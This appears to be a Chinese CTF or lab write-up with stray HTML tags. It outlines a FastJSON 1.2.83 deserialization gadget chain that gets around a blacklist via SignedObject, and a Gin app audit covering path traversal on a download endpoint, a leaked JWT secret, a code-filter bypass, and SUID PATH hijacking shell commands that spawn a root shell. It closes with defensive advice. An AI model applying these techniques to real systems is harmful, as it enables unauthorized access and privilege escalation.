FastJSON高版本反序列化漏洞利用与Gin框架审计实战<\/h1>

一、FastJSON高版本反序列化漏洞利用<\/h2>

1. 环境与限制条件<\/h3>
Spring Boot 2.7 + FastJSON 1.2.83<\/li>
黑名单过滤：
com.sun.org.apache.xalan.internal.xsltc.trax<\/code><\/li>
javax.management<\/code><\/li>
com.fasterxml.jackson<\/code><\/li> <\/ul> <\/li>
过滤效果：

阻断TemplatesImpl<\/code>和BadAttributeValueExpException<\/code>利用<\/li>
阻断Jackson相关的toString<\/code>方法利用类<\/li>
<\/ul>
<\/li>
<\/ul>
2. 绕过思路分析<\/h3>
2.1 引用类型绕过<\/h4>
核心思路是利用黑名单中的引用(reference)类型绕过resolveClass<\/code>检查：<\/p>

通过HotSwappableTargetSource + XString<\/code>组合替代BadAttributeValueExpException<\/code>触发toString<\/code><\/li>
<\/ul>
2.2 二次反序列化绕过<\/h4>
当直接绕过TemplatesImpl<\/code>受限时，可采用SignedObject<\/code>进行二次反序列化：<\/p>

SignedObject.getObject()<\/code>方法会再次执行反序列化操作<\/li>
构造方法第一个参数传入恶意类<\/li>
<\/ul>
3. 完整利用链构造<\/h3>
hashMap2.readObject
-> eventListenerList.readObject
-> UndoManager.toString
-> Vector.toString
-> JSONArray1.toString
-> SignedObject.getObject
-> hashMap1.readObject
-> XString.equals
-> JSONArray.toString
-> TemplatesImpl.getOutputProperties
<\/code><\/pre>
4. 关键代码实现<\/h3>
\/\/ 使用SignedObject进行二次反序列化
<\/span><\/span><\/span><\/span>SignedObject signedObject =<\/span> new<\/span> SignedObject(<\/span>恶意对象<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 触发链构造
<\/span><\/span><\/span>\/\/ 使用EventListenerList+UndoManager触发getObject
<\/span><\/span><\/span><\/code><\/pre>5. 调试问题解决<\/h3>

SignedObject<\/code>本地调试报错default constructor not found<\/code>解决方案：

确保正确初始化参数<\/li>
检查类路径和依赖版本<\/li>
<\/ul>
<\/li>
<\/ul>
二、Gin框架代码审计实战<\/h2>
1. 目录穿越漏洞<\/h3>

发现未过滤的下载接口：
\/<\/span>download<\/span>?<\/span>filename<\/span>=.\/<\/span>config<\/span>\/<\/span>key<\/span>.go<\/span>
<\/span><\/span><\/code><\/pre><\/li>
通过路径遍历读取敏感文件：
http:\/\/node.vnteam.cn:47191\/download?filename=.\/config\/key.go
<\/code><\/pre>
<\/li>
<\/ul>
2. JWT密钥泄露<\/h3>

从泄露的key.go<\/code>中提取JWT密钥：122r00t32l<\/code><\/li>
使用jwt.io<\/code>修改token实现越权<\/li>
<\/ul>
3. 代码执行审计<\/h3>

发现存在代码执行功能<\/li>
过滤缺陷：仅过滤单行import<\/code>语句<\/li>
绕过方法：使用多行import<\/code>或注释绕过<\/li>
<\/ul>
4. 提权利用<\/h3>


查找SUID程序：<\/p>
find \/ -user root -perm \/4000 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现可疑程序：\/...\/Cat<\/code><\/p>
<\/li>

环境变量劫持：<\/p>
# 创建恶意cat<\/span>
<\/span><\/span>echo -e '#!\/bin\/bash\n\/bin\/bash'<\/span> > \/tmp\/cat
<\/span><\/span>chmod +x \/tmp\/cat
<\/span><\/span>
<\/span><\/span># 修改PATH<\/span>
<\/span><\/span>export PATH=<\/span>\/tmp:$PATH
<\/span><\/span>
<\/span><\/span># 执行SUID程序<\/span>
<\/span><\/span>\/...\/Cat
<\/span><\/span><\/code><\/pre><\/li>

读取flag注意事项：<\/p>

避免使用被劫持的cat<\/code><\/li>
使用tac<\/code>或完整路径\/bin\/cat<\/code>读取<\/li>
<\/ul>
<\/li>
<\/ol>
三、参考资源<\/h2>


FastJSON高版本原生利用：

https:\/\/y4tacker.github.io\/2023\/04\/26\/year\/2023\/4\/FastJson%E4%B8%8E%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E4%BA%8C\/#%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8<\/p>
<\/li>

Java反序列化绕过resolveClass：

https:\/\/dummykitty.github.io\/java\/2023\/07\/24\/Java-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87-resolveClass.html<\/p>
<\/li>

先知社区相关文章：<\/p>

https:\/\/xz.aliyun.com\/news\/16045<\/li>
https:\/\/xz.aliyun.com\/news\/12052<\/li>
https:\/\/xz.aliyun.com\/news\/15977<\/li>
<\/ul>
<\/li>
<\/ol>
四、防御建议<\/h2>


FastJSON防御：<\/p>

升级到最新安全版本<\/li>
实现更严格的反序列化过滤<\/li>
禁用不必要的反序列化功能<\/li>
<\/ul>
<\/li>

Gin框架防御：<\/p>

严格校验文件路径<\/li>
加强JWT密钥保护<\/li>
完善代码执行过滤规则<\/li>
避免使用危险函数调用方式<\/li>
<\/ul>
<\/li>
<\/ol>